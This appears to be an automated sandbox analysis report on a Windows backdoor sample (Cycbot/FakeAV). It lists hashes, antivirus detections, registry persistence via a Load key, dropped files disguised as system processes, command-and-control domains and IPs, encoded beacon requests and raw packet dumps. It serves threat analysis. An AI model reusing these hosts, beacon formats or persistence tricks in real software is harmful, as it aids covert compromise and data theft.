Analysis Date2014-11-15 08:32:58
MD595603c5377109ca692a2b1b5d82f8b61
SHA1a8946efb76befdc79ff5bc38751c3015f65ca2ce

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386
Section.text md5: b1175e141d0ec1f8cc5f827796bc6891 sha1: c3116618bee7067c96b207f6f492f9d5f01f46ee size: 193536
Section.rdata md5: 1e89e5dac463552bfdfce46636f89672 sha1: 16596a4b93b862cbac3b4c1d6288a6234c56c718 size: 2048
Section.data md5: 9c3d5ac6868451bfed8991b5cad81728 sha1: a02616c5ac5716a4f419b5bcbc9790e50b696ca5 size: 15872
Section.lib md5: fd895461e110b747939c518eaf79d6ce sha1: 3626ea8ce486e2d1f5f1af91044ce222294cc076 size: 512
Timestamp2005-09-28 13:00:13
VersionPrivateBuild: 1559
PEhash2e0b5b205cbbe931cd756640cb5a6d3fe34193a6
IMPhash1cc9db0911e0b9c9b11871071b0d8932
AV360 SafeGen:Trojan.Heur.KS.1
AVAd-AwareGen:Trojan.Heur.KS.1
AVAlwil (avast)Cybota [Trj]
AVArcabit (arcavir)no_virus
AVAuthentiumW32/Goolbot.E.gen!Eldorado
AVAvira (antivir)TR/Dldr.Age.YP.2.F
AVBullGuardGen:Trojan.Heur.KS.1
AVCA (E-Trust Ino)Win32/Diple.A!generic
AVCAT (quickheal)Backdoor.Cycbot.B
AVClamAVWin.Trojan.Agent-160640
AVDr. WebTrojan.DownLoader2.7573
AVEmsisoftGen:Trojan.Heur.KS.1
AVEset (nod32)Win32/Kryptik.KQK
AVFortinetW32/Katusha.O!tr
AVFrisk (f-prot)W32/Goolbot.E.gen!Eldorado
AVF-SecureGen:Trojan.Heur.KS.1
AVGrisoft (avg)Generic_r.FN
AVIkarusTrojan-Spy.Win32.Zbot
AVK7Backdoor ( 003210941 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesSpyware.Passwords.XGen
AVMcafeeBackDoor-EXI.gen.h
AVMicrosoft Security EssentialsBackdoor:Win32/Cycbot.G
AVMicroWorld (escan)Gen:Trojan.Heur.KS.1
AVNormanGen:Trojan.Heur.KS.1
AVRisingno_virus
AVSophosMal/FakeAV-IS
AVSymantecBackdoor.Cycbot!gen3
AVTrend MicroBKDR_CYCBOT.SME3
AVVirusBlokAda (vba32)Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝
C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Mutex{4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNSdifferentdata-one.com
Winsock DNS127.0.0.1
Winsock DNS4videosoft.com
Winsock DNSzoneak.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates ProcessC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS4videosoft.com
Type: A
174.37.30.144
DNSzonetf.com
Type: A
141.8.225.80
DNSdifferentdata-one.com
Type: A
DNSzoneak.com
Type: A
HTTP GEThttp://4videosoft.com/iphone.gif?tq=gP4aKydSV37m2BcGJnKaslihwRvElRTxZLombdmMFOIH5FqLq52xep%2FKzNtzgMbp%2Bv9fHWGOdqJNOSehWqHWlxTPjBDayFsHzmc7LGAAnxFf9Q%2BxVgGyJjmXJW5hhiNz%2FWNhvVdJqMGmPnTiwF7sQp%2FLryWy3NIUqpY58rlSukSJLAlduAttEqoST%2Bjy8tjS9GEs5xgC8fyx6B8JX4lcsNnVJjoM2pnX%2FUaivNWCbnuGiTfP0XsiR8F8THtmvrcI49iCkoO5TiOvNfXXMEIn6eKu7U6ouaKQwok1irRQt6aVDLtInnBSvb9UJxW78e4Vw9ojx8nvwWZfKBmLNohM5boVDFLHgfw%2F%2Fk1yXFY9kdU2snNHHvu8eGRaz6fziF43mFVNessiR5TBxnplckyLoEBLg3bnK5ZlsIOaObqIARepfoBMVvzgf%2BAPTkHNhhbwZVpCt5bU5N9WARel446kKaVOTpqKumFA1VusFuHxCV3vbMIXQoO%2BxBKxouNJ5wh%2FJukBdi2FlRWd5AHLil5Xcclgab5wLo1TcJVo%2B9w4ppgHhVjp4YBXURvCyY0nr0Kk2PHKvn8zWFeWb
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP192.168.1.1:1031 ➝ 174.37.30.144:80
Flows TCP192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP192.168.1.1:1034 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f697068 6f6e652e 6769663f   GET /iphone.gif?
0x00000010 (00016)   74713d67 5034614b 79645356 33376d32   tq=gP4aKydSV37m2
0x00000020 (00032)   4263474a 6e4b6173 6c696877 5276456c   BcGJnKaslihwRvEl
0x00000030 (00048)   5254785a 4c6f6d62 646d4d46 4f494835   RTxZLombdmMFOIH5
0x00000040 (00064)   46714c71 35327865 70253246 4b7a4e74   FqLq52xep%2FKzNt
0x00000050 (00080)   7a674d62 70253242 76396648 57474f64   zgMbp%2Bv9fHWGOd
0x00000060 (00096)   714a4e4f 53656857 7148576c 7854506a   qJNOSehWqHWlxTPj
0x00000070 (00112)   42446179 4673487a 6d63374c 4741416e   BDayFsHzmc7LGAAn
0x00000080 (00128)   78466639 51253242 78566747 794a6a6d   xFf9Q%2BxVgGyJjm
0x00000090 (00144)   584a5735 6868694e 7a253246 574e6876   XJW5hhiNz%2FWNhv
0x000000a0 (00160)   56644a71 4d476d50 6e546977 46377351   VdJqMGmPnTiwF7sQ
0x000000b0 (00176)   70253246 4c727957 79334e49 55717059   p%2FLryWy3NIUqpY
0x000000c0 (00192)   3538726c 53756b53 4a4c416c 64754174   58rlSukSJLAlduAt
0x000000d0 (00208)   7445716f 53542532 426a7938 746a5339   tEqoST%2Bjy8tjS9
0x000000e0 (00224)   47457335 78674338 66797836 42384a58   GEs5xgC8fyx6B8JX
0x000000f0 (00240)   346c6373 4e6e564a 6a6f4d32 706e5825   4lcsNnVJjoM2pnX%
0x00000100 (00256)   32465561 69764e57 43626e75 47695466   2FUaivNWCbnuGiTf
0x00000110 (00272)   50305873 69523846 38544874 6d767263   P0XsiR8F8THtmvrc
0x00000120 (00288)   49343969 436b6f4f 3554694f 764e6658   I49iCkoO5TiOvNfX
0x00000130 (00304)   584d4549 6e36654b 75375536 6f75614b   XMEIn6eKu7U6ouaK
0x00000140 (00320)   51776f6b 31697252 51743661 56444c74   Qwok1irRQt6aVDLt
0x00000150 (00336)   496e6e42 53766239 554a7857 37386534   InnBSvb9UJxW78e4
0x00000160 (00352)   5677396f 6a78386e 7677575a 664b426d   Vw9ojx8nvwWZfKBm
0x00000170 (00368)   4c4e6f68 4d35626f 5644464c 48676677   LNohM5boVDFLHgfw
0x00000180 (00384)   25324625 32466b31 79584659 396b6455   %2F%2Fk1yXFY9kdU
0x00000190 (00400)   32736e4e 48487675 38654752 617a3666   2snNHHvu8eGRaz6f
0x000001a0 (00416)   7a694634 336d4656 4e657373 69523554   ziF43mFVNessiR5T
0x000001b0 (00432)   42786e70 6c636b79 4c6f4542 4c673362   BxnplckyLoEBLg3b
0x000001c0 (00448)   6e4b355a 6c73494f 614f6271 49415265   nK5ZlsIOaObqIARe
0x000001d0 (00464)   70666f42 4d56767a 67662532 42415054   pfoBMVvzgf%2BAPT
0x000001e0 (00480)   6b484e68 6862775a 56704374 35625535   kHNhhbwZVpCt5bU5
0x000001f0 (00496)   4e395741 52656c34 34366b4b 61564f54   N9WARel446kKaVOT
0x00000200 (00512)   70714b75 6d464131 56757346 75487843   pqKumFA1VusFuHxC
0x00000210 (00528)   56337662 4d495851 6f4f2532 4278424b   V3vbMIXQoO%2BxBK
0x00000220 (00544)   786f754e 4a357768 2532464a 756b4264   xouNJ5wh%2FJukBd
0x00000230 (00560)   6932466c 52576435 41484c69 6c355863   i2FlRWd5AHLil5Xc
0x00000240 (00576)   636c6761 6235774c 6f315463 4a566f25   clgab5wLo1TcJVo%
0x00000250 (00592)   32423977 34707067 4868566a 70345942   2B9w4ppgHhVjp4YB
0x00000260 (00608)   58555276 43795930 6e72304b 6b325048   XURvCyY0nr0Kk2PH
0x00000270 (00624)   4b766e38 7a574665 57622048 5454502f   Kvn8zWFeWb HTTP/
0x00000280 (00640)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000290 (00656)   20636c6f 73650d0a 486f7374 3a203476    close..Host: 4v
0x000002a0 (00672)   6964656f 736f6674 2e636f6d 0d0a4163   ideosoft.com..Ac
0x000002b0 (00688)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000002c0 (00704)   4167656e 743a206f 70657261 2f382e31   Agent: opera/8.1
0x000002d0 (00720)   310d0a0d 0a                           1....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a343620   on: close....46 
0x00000150 (00336)   34623761 34653734 20202046 714c7135   4b7a4e74   FqLq5
0x00000160 (00352)   32786570 2532464b 7a4e740a            2xep%2FKzNt.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a34 20202046 714c7135   ose....4   FqLq5
0x00000160 (00352)   32786570 2532464b 7a4e740a            2xep%2FKzNt.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a4a7857 37386534   close....JxW78e4
0x00000160 (00352)   5677396f 6a78386e 7677575a 664b426d   Vw9ojx8nvwWZfKBm
0x00000170 (00368)   4c4e6f68 4d35626f 5644464c 48676677   LNohM5boVDFLHgfw
0x00000180 (00384)   25324625 32466b31 79584659 396b6455   %2F%2Fk1yXFY9kdU
0x00000190 (00400)   32736e4e 48487675 38654752 617a3666   2snNHHvu8eGRaz6f
0x000001a0 (00416)   7a694634 336d4656 4e657373 69523554   ziF43mFVNessiR5T
0x000001b0 (00432)   42786e70 6c636b79 4c6f4542 4c673362   BxnplckyLoEBLg3b
0x000001c0 (00448)   6e4b355a 6c73494f 614f6271 49415265   nK5ZlsIOaObqIARe
0x000001d0 (00464)   70666f42 4d56767a 67662532 42415054   pfoBMVvzgf%2BAPT
0x000001e0 (00480)   6b484e68 6862775a 56704374 35625535   kHNhhbwZVpCt5bU5
0x000001f0 (00496)   4e395741 52656c34 34366b4b 61564f54   N9WARel446kKaVOT
0x00000200 (00512)   70714b75 6d464131 56757346 75487843   pqKumFA1VusFuHxC
0x00000210 (00528)   56337662 4d495851 6f4f2532 4278424b   V3vbMIXQoO%2BxBK
0x00000220 (00544)   786f754e 4a357768 2532464a 756b4264   xouNJ5wh%2FJukBd
0x00000230 (00560)   6932466c 52576435 41484c69 6c355863   i2FlRWd5AHLil5Xc
0x00000240 (00576)   636c6761 6235774c 6f315463 4a566f25   clgab5wLo1TcJVo%
0x00000250 (00592)   32423977 34707067 4868566a 70345942   2B9w4ppgHhVjp4YB
0x00000260 (00608)   58555276 43795930 6e72304b 6b325048   XURvCyY0nr0Kk2PH
0x00000270 (00624)   4b766e38 7a574665 57622048 5454502f   Kvn8zWFeWb HTTP/
0x00000280 (00640)   312e300d 0a436f6e 6e656374 696f6e3a   1.0..Connection:
0x00000290 (00656)   20636c6f 73650d0a 486f7374 3a203476    close..Host: 4v
0x000002a0 (00672)   6964656f 736f6674 2e636f6d 0d0a4163   ideosoft.com..Ac
0x000002b0 (00688)   63657074 3a202a2f 2a0d0a55 7365722d   cept: */*..User-
0x000002c0 (00704)   4167656e 743a206f 70657261 2f382e31   Agent: opera/8.1
0x000002d0 (00720)   310d0a0d 0a                           1....


Strings
.
.
.
.

040904b0
1559
PrivateBuild
StringFileInfo
TIMES NEW ROMAN
Translation
VarFileInfo
VS_VERSION_INFO
|3AKT^
3O}]h?	?0
4j:o4s
(^4*<N
4>O6>@
6@!j\dD
6yS;bM
7Cop2E
7kOUU~`
7M4iV-Y
88]WJa
9i<	j=
ADVAPI32.dll
AreFileApisANSI
BeginUpdateResourceW
_c"0B90
CharNextA
CharNextW
C(M`HC
CommandLineToArgvW
CopyFileA
CopyFileW
CreateDirectoryA
CreateDirectoryW
CreateFiberEx
CryptAcquireContextA
CryptCreateHash
CryptDestroyHash
CryptGetHashParam
CryptHashData
CryptReleaseContext
@.data
DebugBreak
DeleteFileA
DeleteFileW
^d=:N@
D"R,Kd
E[n90C
EndUpdateResourceW
EnumResourceNamesW
EscapeCommFunction
)?$~}f
FatalExit
FFCq'tJ
FindClose
FreeLibrary
[G0HksODr
GetFileAttributesA
GetFileAttributesW
GetFileInformationByHandle
GetFullPathNameA
GetFullPathNameW
GetOEMCP
GetProcessMemoryInfo
H4N8{`
+h	I-Q
/H\VV*nh
h[vZ6l 
ICInfo
ImageDirectoryEntryToData
ImageGetDigestStream
imagehlp.dll
ImageNtHeader
ImageRvaToVa
iV],n5t
~;	iyS
j9(;4Wy
J<9\}S
JRichu
KERNEL32.dll
Ko.h)~V
LoadLibraryExA
LoadLibraryExW
lstrlenA
mHWx@I
	ml?]8b
MonitorFromWindow
MSVFW32.dll
N0UPt?
N62:?C
).NI(=
n#jhcAZ
=NJm9e
}Nt;VG
Nz6[|~s
/O&OWf
oTiz,d
OUiKi!
OutputDebugStringA
PSAPI.DLL
qM,Ez#\ug
`.rdata
ReadFile
RemoveDirectoryA
RemoveDirectoryW
(rk6!d
SetFileAttributesA
SetFileAttributesW
SHELL32.dll
smJhe>(
T;f&m(
!This program cannot be run in DOS mode.
 "$t\k
{TL/?n
UpdateResourceW
USER32.dll
Uxu;>i
"VC.l`
v[K!6{Z7
|)_*v~UKw
,+Vuti
vVn_Wz
VV<t?<.A
wB'o#lF5
wPLn|7
wsprintfW
WWMzya
*X?	|G
yh+D1(
yiJ8Vc
Y-utI%
Z5Kj,b
zI4w/w